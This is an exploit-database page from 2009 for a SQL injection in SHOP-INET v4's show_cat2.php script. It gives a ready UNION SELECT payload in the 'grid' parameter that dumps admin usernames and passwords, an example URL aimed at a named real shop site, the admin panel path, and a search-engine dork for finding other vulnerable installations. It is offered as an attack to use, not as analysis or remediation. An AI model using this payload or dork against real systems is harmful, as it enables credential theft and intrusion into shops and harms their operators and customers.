[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : SHOP-INET v4 (show_cat2.php grid) SQL Injection Vulnerability
# Published : 2009-01-26
# Author : FeDeReR
# Previous Title : Script Toko Online 5.01 (shop_display_products.php) SQL Injection Vuln
# Next Title : PHP-CMS 1 (username) Blind SQL Injection Exploit


# SHOP-INET V.4 Exploit
# Author: FeDeReR
# Home : Hacking.ge & darkc0de.com
# Email : FeDeReR@avoe.ge

#############################################

Exploit : target.com/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,password)+from+admin

Example :http://shop-inet.ru/shop/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,password)+from+admin

Admin CP: target/admin/

d0rk: inurl:show_cat2.php?grid=

official site: http://shop-inet.ru/

############################################

# www.Syue.com [2009-01-26]